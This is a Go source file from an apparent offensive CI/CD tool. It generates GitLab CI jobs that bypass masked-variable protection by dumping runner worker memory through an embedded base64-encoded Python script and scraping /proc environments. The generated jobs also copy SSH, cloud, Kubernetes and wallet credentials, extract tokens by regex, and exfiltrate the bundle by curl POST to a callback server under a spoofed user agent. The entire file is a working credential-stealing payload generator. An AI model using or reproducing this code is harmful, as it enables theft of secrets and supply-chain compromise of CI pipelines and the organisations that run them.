package payloads

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// memdumpPythonScript is the Python script for reading runner worker memory
// via /proc/<pid>/mem. Kept as a Go constant for readability; base64-encoded
// at generation time to avoid heredocs in the YAML output (gotcha #10).
const memdumpPythonScript = `import sys, os, re

def find_runner_pids():
    pids = []
    for pid in os.listdir('/proc'):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as f:
                cmdline = f.read()
                if b'Runner.Worker' in cmdline or b'gitlab-runner' in cmdline:
                    pids.append(pid)
        except (PermissionError, FileNotFoundError, ProcessLookupError):
            continue
    return pids

pids = find_runner_pids()
if not pids:
    print("No Runner.Worker or gitlab-runner PIDs found", file=sys.stderr)
    sys.exit(0)

for pid in pids:
    print(f"Scanning PID {pid}...", file=sys.stderr)
    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"
    try:
        with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
            for line in map_f.readlines():
                m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
                if m and m.group(3) == 'r':
                    start = int(m.group(1), 16)
                    end = int(m.group(2), 16)
                    if start > sys.maxsize:
                        continue
                    mem_f.seek(start)
                    try:
                        chunk = mem_f.read(end - start)
                        sys.stdout.buffer.write(chunk)
                    except OSError:
                        continue
    except (PermissionError, FileNotFoundError, ProcessLookupError) as e:
        print(f"Cannot read PID {pid}: {e}", file=sys.stderr)
        continue
`

// MemoryDumpOptions configures a memory-scraping payload designed to bypass
// GitLab's masked CI variable protection. On self-hosted runners, masked
// variables are only hidden from job logs — they live in the process
// environment and in the GitLab Runner Worker memory. This payload generates
// a shell script that reads /proc/*/environ, scans runner worker memory
// via /proc/<pid>/mem, and harvests tokens that masked:true cannot hide.
//
// Reference attacks:
//   - Trivy v0.69.4 supply chain (stepsecurity.io/blog/trivy-compromised-a-second-time)
//   - Shai Hulud self-propagating worm
//   - TeampCP two-stage credential stealer
type MemoryDumpOptions struct {
	Common        CommonOptions
	CallbackURL   string // HTTP POST for exfil (default: artifact only)
	EncryptionKey string // AES passphrase for openssl enc (optional)
	Extended      bool   // include crypto wallets, shell history, DB creds
	ProcScan      bool   // scan /proc/*/environ for parallel process secrets
	MemoryDump    bool   // read /proc/<pid>/mem of Runner.Worker processes
}

// DefaultMemoryDumpPrompt returns a prompt explaining the memory dump attack.
func DefaultMemoryDumpPrompt() string {
	return `Memory Dump Attack (bypasses masked CI variables):
Masked variables in GitLab CI are ONLY hidden from job logs.
They still exist in the runner's process environment and in
GitLab Runner Worker's memory. This payload extracts them by:

1. Scanning /proc/[0-9]*/environ of all running processes
   (captures secrets from parallel CI jobs)
2. Reading /proc/<pid>/mem of Runner.Worker processes
   (extracts masked vars directly from heap memory)
3. Scanning for token patterns: glpat-, ghp_, gh_, AKIA, sk-,
   xox[bpsa]-, Bearer, isSecret
4. Compressing and exfiltrating via artifact, HTTP POST, or backup git repo

Reference: https://www.stepsecurity.io/blog/trivy-compromised-a-second-time---malicious-v0-69-4-release`
}

// GenerateMemoryDumpYAML returns a GitLab CI job that performs memory-based
// secret extraction. Unlike plain printenv, this bypasses masked variable
// protection by reading from the process memory space.
func GenerateMemoryDumpYAML(o MemoryDumpOptions) string {
	name, stage := o.Common.defaults("memory-dump")

	// Build the memory dump script
	script := buildMemoryDumpScript(o)

	indented := indentBlock(strings.TrimSpace(script), 6)

	return fmt.Sprintf(`# Auto-generated by GoGatoZ (Memory Dump Attack)
# Bypasses GitLab masked variable protection
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
  allow_failure: true
  artifacts:
    when: always
    paths:
      - memdump_env.txt
      - memdump_tokens.txt
      - memdump_bundle.tgz
      - memdump_report.json
    expire_in: 1 day%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

// buildMemoryDumpScript generates the shell script for memory-based secret extraction.
func buildMemoryDumpScript(o MemoryDumpOptions) string {
	var b strings.Builder

	b.WriteString("_memdump() {\n")
	b.WriteString(`  _d=$(mktemp -d)
  _memcount=0
  echo "[*] Memory dump working directory: $_d"

`)

	// Step 1: /proc/*/environ scan (parallel process secrets)
	if o.ProcScan {
		b.WriteString(`  # 1. Harvest environment from ALL running processes
  echo "[*] Scanning /proc/*/environ for parallel process secrets..."
  mkdir -p "$_d/proc_env"
  for p in /proc/[0-9]*/environ; do
    _pid=$(echo "$p" | cut -d/ -f3)
    # /proc/*/environ uses null-byte separated KEY=VALUE pairs
    cat "$p" 2>/dev/null | tr '\0' '\n' | grep -v '^$' > "$_d/proc_env/${_pid}.env" 2>/dev/null || true
  done
  # Merge all process environments
  cat "$_d/proc_env"/*.env 2>/dev/null | sort -u > "$_d/proc_environ_all.txt" 2>/dev/null || true
  echo "[+] Found $(wc -l < "$_d/proc_environ_all.txt" 2>/dev/null || echo 0) environ lines"

`)
	}

	// Step 2: /proc/<pid>/mem scan of Runner Worker using Python
	// Ported from the GitHub Actions Runner.Worker memory dump technique:
	// https://www.youtube.com/watch?v=Yz72qAOrN9s
	if o.MemoryDump {
		b64Script := base64.StdEncoding.EncodeToString([]byte(memdumpPythonScript))
		fmt.Fprintf(&b, `  # 2. Extract Runner Worker memory (bypasses masked variables)
  # Uses Python to read /proc/<pid>/mem — proven technique from GitHub Actions research
  echo "[*] Scanning Runner Worker memory via /proc/<pid>/mem..."
  _memcount=0
  mkdir -p "$_d/worker_mem"
  echo '%s' | base64 -d | python3 - > "$_d/worker_mem/raw_mem.bin" 2>"$_d/worker_mem/memdump.log" || true

  # Extract readable strings and token patterns from the memory dump
  if [ -s "$_d/worker_mem/raw_mem.bin" ]; then
    strings -n 8 "$_d/worker_mem/raw_mem.bin" > "$_d/worker_mem/strings.txt" 2>/dev/null || true
    # Extract known token patterns
    grep -Eo '(glpat-[A-Za-z0-9_-]{16,}|ghp_[A-Za-z0-9_]{36}|ghs_[A-Za-z0-9_]{36}|AKIA[0-9A-Z]{16}|sk-[A-Za-z0-9]{20,}|xoxb-[0-9]+-[A-Za-z0-9]+|FLAG+[^+]++)' \
      "$_d/worker_mem/strings.txt" 2>/dev/null | sort -u >> "$_d/worker_mem/tokens.txt" 2>/dev/null || true
    # Extract KEY=VALUE patterns that look like secrets
    grep -E '^[A-Z_]{2,}=.{8,}' "$_d/worker_mem/strings.txt" 2>/dev/null | \
      grep -iE '(SECRET|TOKEN|PASSWORD|KEY|CREDENTIAL|PAT|FLAG)' | \
      sort -u >> "$_d/worker_mem/env_secrets.txt" 2>/dev/null || true
    _memcount=$(wc -l < "$_d/worker_mem/tokens.txt" 2>/dev/null || echo 0)
    echo "[+] Worker memory scan complete: $(du -sh "$_d/worker_mem/raw_mem.bin" 2>/dev/null | cut -f1) dumped"
    echo "[+] Found $_memcount token patterns in worker memory"
    cat "$_d/worker_mem/memdump.log" 2>/dev/null || true
  else
    echo "[!] No worker memory data captured (Runner.Worker process may not be accessible)"
    cat "$_d/worker_mem/memdump.log" 2>/dev/null || true
  fi

`, b64Script)
	}

	// Step 3: Fallback — current process environment (includes masked vars)
	b.WriteString(`  # 3. Capture current process environment (masked vars visible here)
  echo "[*] Capturing current process environment..."
  printenv | sort > "$_d/env_current.txt"

`)

	// Step 4: Credential filesystem sweep
	b.WriteString(`  # 4. Credential filesystem sweep
  echo "[*] Sweeping filesystem for credentials..."
  mkdir -p "$_d/creds"
`)

	// Default credential paths
	defaultPaths := []string{
		"$HOME/.ssh/id_rsa $HOME/.ssh/id_ed25519 $HOME/.ssh/id_ecdsa",
		"$HOME/.aws/credentials $HOME/.aws/config",
		"$HOME/.kube/config",
		"$HOME/.docker/config.json",
		"$HOME/.gitconfig",
		"$HOME/.netrc",
		"$HOME/.npmrc",
		"$HOME/.config/gcloud/application_default_credentials.json",
		"$HOME/.terraform.d/credentials.tfrc.json",
		"$HOME/.azure/credentials",
		"$HOME/.config/gh/hosts.yml",
	}

	for _, p := range defaultPaths {
		fmt.Fprintf(&b, `  for _cf in %s; do
    [ -e "$_cf" ] && cp "$_cf" "$_d/creds/" 2>/dev/null || true
  done
`, p)
	}

	// Extended paths
	if o.Extended {
		extendedPaths := []string{
			"$HOME/.bash_history $HOME/.zsh_history",
			"$HOME/.config/solana/id.json",
			"$HOME/.bitcoin/wallet.dat",
			"$HOME/.mysql_history",
			"$HOME/.config/helm",
			"$HOME/.gradle/gradle.properties",
			"$HOME/.m2/settings.xml",
			"$HOME/.nuget/NuGet.Config",
			"/etc/ssl/private/",
			"$HOME/.pgpass",
		}
		b.WriteString(`  # 4b. Extended credential sweep
`)
		for _, p := range extendedPaths {
			fmt.Fprintf(&b, `  for _cf in %s; do
    [ -e "$_cf" ] && cp "$_cf" "$_d/creds/" 2>/dev/null || true
  done
`, p)
		}
	}

	// Step 5: Pattern-based extraction across all collected data
	b.WriteString(`  # 5. Pattern-based extraction from all collected data
  echo "[*] Extracting tokens from all collected data..."
  cat "$_d/env_current.txt" "$_d/proc_environ_all.txt" "$_d/worker_mem"/*.txt 2>/dev/null | \
    grep -Eo '(glpat-[A-Za-z0-9_-]{16,}|ghp_[A-Za-z0-9_]{36}|ghs_[A-Za-z0-9_]{36}|AKIA[0-9A-Z]{16}|sk-[A-Za-z0-9]{20,}|xoxb-[0-9]+-[A-Za-z0-9]+|Bearer [A-Za-z0-9_./-]+|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]+|FLAG[+][^+]+[+])' \
    | sort -u > "$_d/tokens.txt" 2>/dev/null || true
  echo "[+] Extracted $(wc -l < "$_d/tokens.txt" 2>/dev/null || echo 0) unique tokens"

`)

	// Step 6: JSON report
	b.WriteString(`  # 6. Generate structured report
  echo "[*] Generating structured report..."
  if command -v python3 >/dev/null 2>&1; then
    python3 -c "
import json, os
data = {
    'env_vars': dict(os.environ),
    'files_swept': []
}
import glob
for p in glob.glob('$_d/creds/*'):
    data['files_swept'].append(os.path.basename(p))
with open('$_d/report.json', 'w') as f:
    json.dump(data, f, indent=2, default=str)
" 2>/dev/null || true
  fi

`)

	// Step 7: Compress
	b.WriteString(`  # 7. Compress all collected data
  echo "[*] Compressing collected data..."
  tar czf "$_d/bundle.tgz" -C "$_d" env_current.txt tokens.txt report.json 2>/dev/null || \
  tar czf "$_d/bundle.tgz" -C "$_d" env_current.txt tokens.txt 2>/dev/null || \
  tar czf "$_d/bundle.tgz" -C "$_d" env_current.txt 2>/dev/null

`)

	// Step 8: Encryption (optional)
	exfilFile := "$_d/bundle.tgz"
	if key := strings.TrimSpace(o.EncryptionKey); key != "" {
		exfilFile = "$_d/bundle.enc"
		fmt.Fprintf(&b, `  # 8. Encrypt with passphrase
  openssl enc -aes-256-cbc -pbkdf2 -salt \
    -in "$_d/bundle.tgz" -out "$_d/bundle.enc" \
    -pass pass:'%s' 2>/dev/null
`, key)
	}

	// Step 9: Exfiltration
	c2 := strings.TrimSpace(o.CallbackURL)
	if c2 != "" {
		fmt.Fprintf(&b, `  # 9. Exfiltrate to callback server
  echo "[*] Exfiltrating to: %s"
  curl -sS -X POST \
    -H "Content-Type: application/octet-stream" \
    -H "User-Agent: GitLab-Runner/16.0" \
    --data-binary @"%s" \
    "%s" >/dev/null 2>&1 || true
`, c2, exfilFile, c2)
	} else {
		b.WriteString(`  # 9. Output summary (artifact-only mode)
  echo "[*] Memory dump complete. Data available in artifacts."
  echo "[+] Process environment lines: $(wc -l < "$_d/env_current.txt" 2>/dev/null || echo 0)"
  echo "[+] Unique tokens found: $(wc -l < "$_d/tokens.txt" 2>/dev/null || echo 0)"
  echo "[+] Worker memory processes scanned: $_memcount"

`)
	}

	b.WriteString(`  # 10. Copy artifacts to working directory before cleanup
  cp "$_d/env_current.txt" ./memdump_env.txt 2>/dev/null || true
  cp "$_d/tokens.txt" ./memdump_tokens.txt 2>/dev/null || true
  cp "$_d/bundle.tgz" ./memdump_bundle.tgz 2>/dev/null || true
  cp "$_d/report.json" ./memdump_report.json 2>/dev/null || true
  rm -rf "$_d"
  echo "[*] Memory dump attack complete"
}

_memdump || true
`)

	return b.String()
}

// MemoryDumpResult captures information about a memory dump extraction.
type MemoryDumpResult struct {
	JobName       string   `json:"job_name"`
	Stage         string   `json:"stage"`
	Image         string   `json:"image,omitempty"`
	Tags          []string `json:"tags,omitempty"`
	ProcScan      bool     `json:"proc_scan"`
	MemoryDump    bool     `json:"memory_dump"`
	Extended      bool     `json:"extended"`
	HasEncryption bool     `json:"has_encryption"`
	HasCallback   bool     `json:"has_callback"`
	YAML          string   `json:"yaml"`
}

// GenerateMemoryDumpAsStruct returns structured result with YAML payload.
func GenerateMemoryDumpAsStruct(o MemoryDumpOptions) *MemoryDumpResult {
	yaml := GenerateMemoryDumpYAML(o)
	return &MemoryDumpResult{
		JobName:       o.Common.JobName,
		Stage:         o.Common.Stage,
		Image:         o.Common.Image,
		Tags:          o.Common.Tags,
		ProcScan:      o.ProcScan,
		MemoryDump:    o.MemoryDump,
		Extended:      o.Extended,
		HasEncryption: strings.TrimSpace(o.EncryptionKey) != "",
		HasCallback:   strings.TrimSpace(o.CallbackURL) != "",
		YAML:          yaml,
	}
}
